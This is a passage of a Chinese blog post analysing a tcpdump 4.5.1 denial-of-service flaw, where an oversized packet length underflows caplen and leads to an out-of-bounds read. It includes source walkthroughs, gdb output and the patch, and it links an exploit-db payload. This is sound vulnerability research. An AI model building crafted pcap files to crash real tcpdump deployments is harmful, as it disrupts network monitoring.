class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><span class="line">25. u_int</span><br><span class="line">26. ieee802_15_4_if_print(struct netdissect_options *ndo,</span><br><span class="line">27. const struct pcap_pkthdr *h, const u_char *p)</span><br><span class="line">28. &#123;</span><br><span class="line">29. printf(&quot;address : %x\n&quot;,p);</span><br><span class="line">30. u_int caplen = h-&gt;caplen; //传入的caplen赋值给无符号整形变量caplen,且该值为8</span><br><span class="line">31. int hdrlen;</span><br><span class="line">32. u_int16_t fc;</span><br><span class="line">33. u_int8_t seq;</span><br><span class="line">34. if (caplen &lt; 3) &#123; //不满足</span><br><span class="line">35. ND_PRINT((ndo, &quot;[|802.15.4] %x&quot;, caplen));</span><br><span class="line">36. return caplen;</span><br><span class="line">37. &#125;</span><br><span class="line">38. fc = EXTRACT_LE_16BITS(p);</span><br><span class="line">39. hdrlen = extract_header_length(fc);</span><br><span class="line">40. seq = EXTRACT_LE_8BITS(p + 2);</span><br><span class="line">41. p += 3;</span><br><span class="line">42. caplen -= 3;//此时caplen = 5</span><br><span class="line">43. ND_PRINT((ndo,&quot;IEEE 802.15.4 %s packet &quot;, ftypes[fc &amp; 0x7]));</span><br><span class="line">44. if (vflag)</span><br><span class="line">45. ND_PRINT((ndo,&quot;seq %02x &quot;, seq));</span><br><span class="line">46. if (hdrlen == -1) &#123;</span><br><span class="line">47. ND_PRINT((ndo,&quot;malformed! &quot;));</span><br><span class="line">48. return caplen;</span><br><span class="line">49. &#125;</span><br><span class="line">50. if (!vflag) &#123;</span><br><span class="line">51. p+= hdrlen;</span><br><span class="line">52. caplen -= hdrlen;</span><br><span class="line">53. &#125; else &#123;</span><br><span class="line">54. u_int16_t panid = 0;</span><br><span class="line">55. switch ((fc &gt;&gt; 10) &amp; 0x3) &#123;</span><br><span class="line">56. case 0x00:</span><br><span class="line">57. ND_PRINT((ndo,&quot;none &quot;));</span><br><span class="line">58. break;</span><br><span class="line">59. case 0x01:</span><br><span class="line">60. ND_PRINT((ndo,&quot;reserved destination addressing mode&quot;));</span><br><span class="line">61. return 0;</span><br><span class="line">62. case 0x02:</span><br><span class="line">63. panid = EXTRACT_LE_16BITS(p);</span><br><span class="line">64. p += 2;</span><br><span class="line">65. ND_PRINT((ndo,&quot;%04x:%04x &quot;, panid, EXTRACT_LE_16BITS(p)));</span><br><span class="line">66. p += 2;</span><br><span class="line">67. break;</span><br><span class="line">68. case 0x03:</span><br><span class="line">69. panid = EXTRACT_LE_16BITS(p);</span><br><span class="line">70. p += 2;</span><br><span class="line">71. ND_PRINT((ndo,&quot;%04x:%s &quot;, panid, le64addr_string(p)));</span><br><span class="line">72. p += 8;</span><br><span class="line">73. break;</span><br><span class="line">74. &#125;</span><br><span class="line">75. ND_PRINT((ndo,&quot;&lt; &quot;);</span><br><span class="line">76. switch ((fc &gt;&gt; 14) &amp; 0x3) &#123;</span><br><span class="line">77. case 0x00:</span><br><span class="line">78. ND_PRINT((ndo,&quot;none &quot;));</span><br><span class="line">79. break;</span><br><span class="line">80. case 0x01:</span><br><span class="line">81. ND_PRINT((ndo,&quot;reserved source addressing mode&quot;));</span><br><span class="line">82. return 0;</span><br><span class="line">83. case 0x02:</span><br><span class="line">84. if (!(fc &amp; (1 &lt;&lt; 6))) &#123;</span><br><span class="line">85. panid = EXTRACT_LE_16BITS(p);</span><br><span class="line">86. p += 2;</span><br><span class="line">87. &#125;</span><br><span class="line">88. ND_PRINT((ndo,&quot;%04x:%04x &quot;, panid, EXTRACT_LE_16BITS(p)));</span><br><span class="line">89. p += 2;</span><br><span class="line">90. break;</span><br><span class="line">91. case 0x03:</span><br><span class="line">92. if (!(fc &amp; (1 &lt;&lt; 6))) &#123;</span><br><span class="line">93. panid = EXTRACT_LE_16BITS(p);</span><br><span class="line">94. p += 2;</span><br><span class="line">95. &#125;</span><br><span class="line">96. ND_PRINT((ndo,&quot;%04x:%s &quot;, panid, le64addr_string(p))));</span><br><span class="line">97. p += 8;</span><br><span class="line">98. break;</span><br><span class="line">99. &#125;</span><br><span class="line">100. caplen -= hdrlen;</span><br><span class="line">101. &#125;</span><br></pre></td></tr></table></figure>
<p>传入的第二个值是struct pcap_pkthdr *h结构体函数使用的参数caplen就是结构体中的caplen不难看出caplen进行一些加减操作后没有判断正负直接丢给了下一个函数使用。<br>直接跟进函数,看看最后赋值情况</p>
<p>从源码和调试信息可以看到libpcap在处理不正常包时不严谨导致包的头长度hdrlen竟然大于捕获包长度caplen并且在处理时又没有相关的判断。hdrlen和caplen都是非负整数导致caplen==0xfffffff3过长。<br>继续跟进hex_and_asciii_print(ndo_default_print)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">1. void</span><br><span class="line">2. hex_and_ascii_print(register const char *ident, register const u_char *cp,</span><br><span class="line">3. register u_int length)</span><br><span class="line">4. &#123;</span><br><span class="line">5. hex_and_ascii_print_with_offset(ident, cp, length, 0);</span><br><span class="line">6. &#125;</span><br><span class="line"></span><br><span class="line">其中length==0xfffffff3继续执行</span><br><span class="line">1. void</span><br><span class="line">2. hex_print_with_offset(register const char *ident, register const u_char *cp, register u_int length,</span><br><span class="line">3. register u_int oset)</span><br><span class="line">4. &#123;</span><br><span class="line">5. register u_int i, s;</span><br><span class="line">6. register int nshorts;</span><br><span class="line">7.</span><br><span class="line">8. nshorts = (u_int) length / sizeof(u_short);</span><br><span class="line">9. i = 0;</span><br><span class="line">10. while (--nshorts &gt;= 0) &#123;</span><br><span class="line">11. if ((i++ % 8) == 0) &#123;</span><br><span class="line">12. (void)printf(&quot;%s0x%04x: &quot;, ident, oset);</span><br><span class="line">13. oset += HEXDUMP_BYTES_PER_LINE;</span><br><span class="line">14. &#125;</span><br><span class="line">15. s = *cp++; &lt;======= 抛出错误位置</span><br><span class="line">16. (void)printf(&quot; %02x%02x&quot;, s, *cp++);</span><br><span class="line">17. &#125;</span><br><span class="line">18. if (length &amp; 1) &#123;</span><br><span class="line">19. if ((i % 8) == 0)</span><br><span class="line">20. (void)printf(&quot;%s0x%04x: &quot;, ident, oset);</span><br><span class="line">21. (void)printf(&quot; %02x&quot;, *cp);</span><br><span class="line">22. &#125;</span><br><span class="line">nshorts=(u_int) length / sizeof(u_short) =&gt; nshorts=0xfffffff3/2=7FFFFFF9</span><br></pre></td></tr></table></figure>
<p>但数据包数据没有这么长导致了crash。</p>
<h3 id="内存分析"><a href="#内存分析" class="headerlink" title="内存分析"></a>内存分析</h3><p>仔细分析之后发现通过len判断的这个长度并没有进行控制如果是自己构造的一个超长len的数据包则会连续读取到不可估计的值。<br>通过查看epx的值来看一下这个内存到底开辟到什么位置<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1. gdb-peda$ x/10000000x 0x81e33bd</span><br><span class="line">2. 0x8203fdd: 0x00000000 0x00000000 0x00000000 0x00000000</span><br><span class="line">3. 0x8203fed: 0x00000000 0x00000000 0x00000000 0x00000000</span><br><span class="line">4. 0x8203ffd: Cannot access memory at address 0x8204000</span><br></pre></td></tr></table></figure></p>
<p>可以看到到达0x 8204000附近的时候就是无法读取的无效地址了那么初始值为0x 81e33bd用两个值相减。0x 8204000-0x 81e33bd = 0x 20c40因为ebx+ebp*2+0x1一次读取两个字节那么循环计数器就要除以2最后结果为0x 10620。<br>来看一下到达拒绝服务位置读取的长度EBX: 0x81e33bd &gt; 0x0EBP: 0x10621<br>EBP刚好为10621。正是不可读取内存空间的地址因此造成拒绝服务。</p>
<h3 id="漏洞总结"><a href="#漏洞总结" class="headerlink" title="漏洞总结"></a>漏洞总结</h3><p>总结一下整个漏洞触发过程首先tcpdump会读取恶意构造的pcap包在构造pcap包的时候设置一个超长的数据包长度tcpdump会根据len的长度去读取保存在内存空间数据包的内容当引用到不可读取内存位置时会由于引用不可读指针造成拒绝服务漏洞。</p>
<h2 id="漏洞修补"><a href="#漏洞修补" class="headerlink" title="漏洞修补"></a>漏洞修补</h2><p>Libpcap依然是apt安装的默认版本tcpdump使用4.7 .0-bp版本<br>在hex_and_ascii_print_with_offset中增加对caplength的判断<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">1. caplength = (ndo-&gt;ndo_snapend &gt;= cp) ? ndo-&gt;ndo_snapend - cp : 0;</span><br><span class="line">2. if (length &gt; caplength)</span><br><span class="line">3. length = caplength;</span><br><span class="line">4. nshorts = length / sizeof(u_short);</span><br><span class="line">5. i = 0;</span><br><span class="line">6. hsp = hexstuff; asp = asciistuff;</span><br><span class="line">7. while (--nshorts &gt;= 0) &#123;</span><br><span class="line">8. ...</span><br><span class="line">9. &#125;</span><br></pre></td></tr></table></figure></p>
<p>可以看到执行完caplength = (ndo-&gt;ndo_snapend &gt;= cp) ? ndo-&gt;ndo_snapend - cp : 0;caplength为0继续执行可以推出length同样为0到这里已经不会发生错误了。</p>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p><a href="https://www.exploit-db.com/exploits/39875/" target="_blank" rel="noopener">exploit-db payload</a><br><a href="https://whereisk0shl.top/post/2016-10-23-1" target="_blank" rel="noopener">WHEREISK0SHL分析博客</a><br><a href="https://github.com/the-tcpdump-group" target="_blank" rel="noopener">libpcap/tcpdump源码</a></p>
</div>
<div>
<div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
<div>您的支持将鼓励我继续创作!</div>
<button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
<span>打赏</span>
</button>
<div id="QR" style="display: none;">
<div id="wechat" style="display: inline-block">
<img id="wechat_qr" src="/images/Wechatpay.png" alt="Cool-Y 微信支付">
<p>微信支付</p>
</div>
<div id="alipay" style="display: inline-block">
<img id="alipay_qr" src="/images/Alipay.png" alt="Cool-Y 支付宝">
<p>支付宝</p>
</div>
</div>
</div>
</div>
<footer class="post-footer">
<div class="post-tags">
<a href="/tags/TCPDUMP/" rel="tag"># TCPDUMP</a>
<a href="/tags/拒绝服务攻击/" rel="tag"># 拒绝服务攻击</a>
</div>
<div class="post-nav">
<div class="post-nav-next post-nav-item">
<a href="/2018/12/23/基于规则引擎发现IOT设备/" rel="next" title="基于采集规则引擎的物联网设备发现方法">
<i class="fa fa-chevron-left"></i> 基于采集规则引擎的物联网设备发现方法
</a>
</div>
<span class="post-nav-divider"></span>
<div class="post-nav-prev post-nav-item">
<a href="/2019/01/16/wifi半双工侧信道攻击学习笔记/" rel="prev" title="wifi半双工侧信道攻击学习笔记">
wifi半双工侧信道攻击学习笔记 <i class="fa fa-chevron-right"></i>
</a>
</div>
</div>
</footer>
</div>
</article>
<div class="post-spread">
</div>
</div>
</div>
<div class="comments" id="comments">
<div id="gitment-container"></div>
</div>
</div>
<div class="sidebar-toggle">
<div class="sidebar-toggle-line-wrap">
<span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
<span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
<span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
</div>
</div>
<aside id="sidebar" class="sidebar">
<div class="sidebar-inner">
<ul class="sidebar-nav motion-element">
<li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
文章目录
</li>
<li class="sidebar-nav-overview" data-target="site-overview-wrap">
站点概览
</li>
</ul>
<section class="site-overview-wrap sidebar-panel">
<div class="site-overview">
<div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
<img class="site-author-image" itemprop="image" src="/images/avatar.png" alt="Cool-Y">
<p class="site-author-name" itemprop="name">Cool-Y</p>
<p class="site-description motion-element" itemprop="description"></p>
</div>
<nav class="site-state motion-element">
<div class="site-state-item site-state-posts">
<a href="/archives/">
<span class="site-state-item-count">17</span>
<span class="site-state-item-name">日志</span>
</a>
</div>
<div class="site-state-item site-state-categories">
<a href="/categories/index.html">
<span class="site-state-item-count">6</span>
<span class="site-state-item-name">分类</span>
</a>
</div>
<div class="site-state-item site-state-tags">
<a href="/tags/index.html">
<span class="site-state-item-count">33</span>
<span class="site-state-item-name">标签</span>
</a>
</div>
</nav>
<div class="links-of-author motion-element">
<span class="links-of-author-item">
<a href="https://github.com/Cool-Y" target="_blank" title="GitHub">
<i class="fa fa-fw fa-github"></i>GitHub</a>
</span>
<span class="links-of-author-item">
<a href="mailto:cool.yim@whu.edu.cn" target="_blank" title="E-Mail">
<i class="fa fa-fw fa-envelope"></i>E-Mail</a>
</span>
<span class="links-of-author-item">
<a href="https://www.instagram.com/yan__han/" target="_blank" title="Instagram">
<i class="fa fa-fw fa-instagram"></i>Instagram</a>
</span>
</div>
</div>
</section>
<!--noindex-->
<section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
<div class="post-toc">
<div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#TCPDUMP-4-5-1-拒绝服务攻击漏洞分析"><span class="nav-text">TCPDUMP 4.5.1 拒绝服务攻击漏洞分析</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Tcpdump介绍"><span class="nav-text">Tcpdump介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#分析环境"><span class="nav-text">分析环境</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞复现"><span class="nav-text">漏洞复现</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#编译安装tcpdump"><span class="nav-text">编译安装tcpdump</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#生成payload来自exploit-db-payload"><span class="nav-text">生成payload来自exploit-db payload</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#崩溃分析"><span class="nav-text">崩溃分析</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#pcap包格式"><span class="nav-text">pcap包格式</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#gdb调试"><span class="nav-text">gdb调试</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#内存分析"><span class="nav-text">内存分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞总结"><span class="nav-text">漏洞总结</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞修补"><span class="nav-text">漏洞修补</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#参考"><span class="nav-text">参考</span></a></li></ol></li></ol></div>
</div>
</section>
<!--/noindex-->
</div>
</aside>
</div>
</main>
<footer id="footer" class="footer">
<div class="footer-inner">
<div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
<span class="with-love">
<i class="fa fa-user"></i>
</span>
<span class="author" itemprop="copyrightHolder">Cool-Y</span>
<span class="post-meta-divider">|</span>
<span class="post-meta-item-icon">
<i class="fa fa-area-chart"></i>
</span>
<span title="Site words total count">48.1k</span>
</div>
<div class="powered-by"><a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>
<div class="busuanzi-count">
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<span class="site-uv">
<i class="fa fa-user"></i>
<span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
</span>
<span class="site-pv">
<i class="fa fa-eye"></i>
<span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
</span>
</div>
</div>
</footer>
<div class="back-to-top">
<i class="fa fa-arrow-up"></i>
</div>
</div>
<script type="text/javascript">
if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
window.Promise = null;
}
</script>
<script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
<script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
<script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
<script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
<script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
<script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
<script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>
<!-- LOCAL: You can save these files to your site and update links -->
<link rel="stylesheet" href="https://jjeejj.github.io/css/gitment.css">
<script src="https://jjeejj.github.io/js/gitment.js"></script>
<!-- END LOCAL -->
<script type="text/javascript">
function renderGitment(){
var gitment = new Gitment({
id: window.location.pathname,
owner: 'Cool-Y',
repo: 'gitment-comments',
oauth: {
client_secret: '1c5db4da72df5e6fc318d12afe5f4406f7c54343',
client_id: '180955a2c3ae3d966d9a'
}});
gitment.render('gitment-container');
}
renderGitment();
</script>
<script type="text/javascript">
// Popup Window;
var isfetched = false;
var isXml = true;
// Search DB path;
var search_path = "search.xml";
if (search_path.length === 0) {
search_path = "search.xml";
} else if (/json$/i.test(search_path)) {
isXml = false;
}
var path = "/" + search_path;
// monitor main search box;
var onPopupClose = function (e) {
$('.popup').hide();
$('#local-search-input').val('');
$('.search-result-list').remove();
$('#no-result').remove();
$(".local-search-pop-overlay").remove();
$('body').css('overflow', '');
}
function proceedsearch() {
$("body")
.append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
.css('overflow', 'hidden');
$('.search-popup-overlay').click(onPopupClose);
$('.popup').toggle();
var $localSearchInput = $('#local-search-input');
$localSearchInput.attr("autocapitalize", "none");
$localSearchInput.attr("autocorrect", "off");
$localSearchInput.focus();
}
// search function;
var searchFunc = function(path, search_id, content_id) {
'use strict';
// start loading animation
$("body")
.append('<div class="search-popup-overlay local-search-pop-overlay">' +
'<div id="search-loading-icon">' +
'<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
'</div>' +
'</div>')
.css('overflow', 'hidden');
$("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');
$.ajax({
url: path,
dataType: isXml ? "xml" : "json",
async: true,
success: function(res) {
// get the contents from search data
isfetched = true;
$('.popup').detach().appendTo('.header-inner');
var datas = isXml ? $("entry", res).map(function() {
return {
title: $("title", this).text(),
content: $("content",this).text(),
url: $("url" , this).text()
};
}).get() : res;
var input = document.getElementById(search_id);
var resultContent = document.getElementById(content_id);
var inputEventFunction = function() {
var searchText = input.value.trim().toLowerCase();
var keywords = searchText.split(/[\s\-]+/);
if (keywords.length > 1) {
keywords.push(searchText);
}
var resultItems = [];
if (searchText.length > 0) {
// perform local searching
datas.forEach(function(data) {
var isMatch = false;
var hitCount = 0;
var searchTextCount = 0;
var title = data.title.trim();
var titleInLowerCase = title.toLowerCase();
var content = data.content.trim().replace(/<[^>]+>/g,"");
var contentInLowerCase = content.toLowerCase();
var articleUrl = decodeURIComponent(data.url);
var indexOfTitle = [];
var indexOfContent = [];
// only match articles with not empty titles
if(title != '') {
keywords.forEach(function(keyword) {
function getIndexByWord(word, text, caseSensitive) {
var wordLen = word.length;
if (wordLen === 0) {
return [];
}
var startPosition = 0, position = [], index = [];
if (!caseSensitive) {
text = text.toLowerCase();
word = word.toLowerCase();
}
while ((position = text.indexOf(word, startPosition)) > -1) {
index.push({position: position, word: word});
startPosition = position + wordLen;
}
return index;
}
indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
});
if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
isMatch = true;
hitCount = indexOfTitle.length + indexOfContent.length;
}
}
// show search results
if (isMatch) {
// sort index by position of keyword
[indexOfTitle, indexOfContent].forEach(function (index) {
index.sort(function (itemLeft, itemRight) {
if (itemRight.position !== itemLeft.position) {
return itemRight.position - itemLeft.position;
} else {
return itemLeft.word.length - itemRight.word.length;
}
});
});
// merge hits into slices
function mergeIntoSlice(text, start, end, index) {
var item = index[index.length - 1];
var position = item.position;
var word = item.word;
var hits = [];
var searchTextCountInSlice = 0;
while (position + word.length <= end && index.length != 0) {
if (word === searchText) {
searchTextCountInSlice++;
}
hits.push({position: position, length: word.length});
var wordEnd = position + word.length;
// move to next position of hit
index.pop();
while (index.length != 0) {
item = index[index.length - 1];
position = item.position;
word = item.word;
if (wordEnd > position) {
index.pop();
} else {
break;
}
}
}
searchTextCount += searchTextCountInSlice;
return {
hits: hits,
start: start,
end: end,
searchTextCount: searchTextCountInSlice
};
}
var slicesOfTitle = [];
if (indexOfTitle.length != 0) {
slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
}
var slicesOfContent = [];
while (indexOfContent.length != 0) {
var item = indexOfContent[indexOfContent.length - 1];
var position = item.position;
var word = item.word;
// cut out 100 characters
var start = position - 20;
var end = position + 80;
if(start < 0){
start = 0;
}
if (end < position + word.length) {
end = position + word.length;
}
if(end > content.length){
end = content.length;
}
slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
}
// sort slices in content by search text's count and hits' count
slicesOfContent.sort(function (sliceLeft, sliceRight) {
if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
return sliceRight.searchTextCount - sliceLeft.searchTextCount;
} else if (sliceLeft.hits.length !== sliceRight.hits.length) {
return sliceRight.hits.length - sliceLeft.hits.length;
} else {
return sliceLeft.start - sliceRight.start;
}
});
// select top N slices in content
var upperBound = parseInt('1');
if (upperBound >= 0) {
slicesOfContent = slicesOfContent.slice(0, upperBound);
}
// highlight title and content
function highlightKeyword(text, slice) {
var result = '';
var prevEnd = slice.start;
slice.hits.forEach(function (hit) {
result += text.substring(prevEnd, hit.position);
var end = hit.position + hit.length;
result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
prevEnd = end;
});
result += text.substring(prevEnd, slice.end);
return result;
}
var resultItem = '';
if (slicesOfTitle.length != 0) {
resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
} else {
resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
}
slicesOfContent.forEach(function (slice) {
resultItem += "<a href='" + articleUrl + "'>" +
"<p class=\"search-result\">" + highlightKeyword(content, slice) +
"...</p>" + "</a>";
});
resultItem += "</li>";
resultItems.push({
item: resultItem,
searchTextCount: searchTextCount,
hitCount: hitCount,
id: resultItems.length
});
}
})
};
if (keywords.length === 1 && keywords[0] === "") {
resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
} else if (resultItems.length === 0) {
resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
} else {
resultItems.sort(function (resultLeft, resultRight) {
if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
return resultRight.searchTextCount - resultLeft.searchTextCount;
} else if (resultLeft.hitCount !== resultRight.hitCount) {
return resultRight.hitCount - resultLeft.hitCount;
} else {
return resultRight.id - resultLeft.id;
}
});
var searchResultList = '<ul class=\"search-result-list\">';
resultItems.forEach(function (result) {
searchResultList += result.item;
})
searchResultList += "</ul>";
resultContent.innerHTML = searchResultList;
}
}
if ('auto' === 'auto') {
input.addEventListener('input', inputEventFunction);
} else {
$('.search-icon').click(inputEventFunction);
input.addEventListener('keypress', function (event) {
if (event.keyCode === 13) {
inputEventFunction();
}
});
}
// remove loading animation
$(".local-search-pop-overlay").remove();
$('body').css('overflow', '');
proceedsearch();
}
});
}
// handle and trigger popup window;
$('.popup-trigger').click(function(e) {
e.stopPropagation();
if (isfetched === false) {
searchFunc(path, 'local-search-input', 'local-search-result');
} else {
proceedsearch();
};
});
$('.popup-btn-close').click(onPopupClose);
$('.popup').click(function(e){
e.stopPropagation();
});
$(document).on('keyup', function (event) {
var shouldDismissSearchPopup = event.which === 27 &&
$('.search-popup').is(':visible');
if (shouldDismissSearchPopup) {
onPopupClose();
}
});
</script>
<script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
<script>AV.initialize("EWwoJgHNdlj6iBjiFlMcabUO-gzGzoHsz", "x8FxDrYG79C8YFrTww9ljo8K");</script>
<script>
function showTime(Counter) {
var query = new AV.Query(Counter);
var entries = [];
var $visitors = $(".leancloud_visitors");
$visitors.each(function () {
entries.push( $(this).attr("id").trim() );
});
query.containedIn('url', entries);
query.find()
.done(function (results) {
var COUNT_CONTAINER_REF = '.leancloud-visitors-count';
if (results.length === 0) {
$visitors.find(COUNT_CONTAINER_REF).text(0);
return;
}
for (var i = 0; i < results.length; i++) {
var item = results[i];
var url = item.get('url');
var time = item.get('time');
var element = document.getElementById(url);
$(element).find(COUNT_CONTAINER_REF).text(time);
}
for(var i = 0; i < entries.length; i++) {
var url = entries[i];
var element = document.getElementById(url);
var countSpan = $(element).find(COUNT_CONTAINER_REF);
if( countSpan.text() == '') {
countSpan.text(0);
}
}
})
.fail(function (object, error) {
console.log("Error: " + error.code + " " + error.message);
});
}
function addCount(Counter) {
var $visitors = $(".leancloud_visitors");
var url = $visitors.attr('id').trim();
var title = $visitors.attr('data-flag-title').trim();
var query = new AV.Query(Counter);
query.equalTo("url", url);
query.find({
success: function(results) {
if (results.length > 0) {
var counter = results[0];
counter.fetchWhenSave(true);
counter.increment("time");
counter.save(null, {
success: function(counter) {
var $element = $(document.getElementById(url));
$element.find('.leancloud-visitors-count').text(counter.get('time'));
},
error: function(counter, error) {
console.log('Failed to save Visitor num, with error message: ' + error.message);
}
});
} else {
var newcounter = new Counter();
/* Set ACL */
var acl = new AV.ACL();
acl.setPublicReadAccess(true);
acl.setPublicWriteAccess(true);
newcounter.setACL(acl);
/* End Set ACL */
newcounter.set("title", title);
newcounter.set("url", url);
newcounter.set("time", 1);
newcounter.save(null, {
success: function(newcounter) {
var $element = $(document.getElementById(url));
$element.find('.leancloud-visitors-count').text(newcounter.get('time'));
},
error: function(newcounter, error) {
console.log('Failed to create');
}
});
}
},
error: function(error) {
console.log('Error:' + error.code + " " + error.message);
}
});
}
$(function() {
var Counter = AV.Object.extend("Counter");
if ($('.leancloud_visitors').length == 1) {
addCount(Counter);
} else if ($('.post-title-link').length > 1) {
showTime(Counter);
}
});
</script>
<script>
(function(){
var bp = document.createElement('script');
var curProtocol = window.location.protocol.split(':')[0];
if (curProtocol === 'https') {
bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
}
else {
bp.src = 'http://push.zhanzhang.baidu.com/push.js';
}
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(bp, s);
})();
</script>
</body>
</html>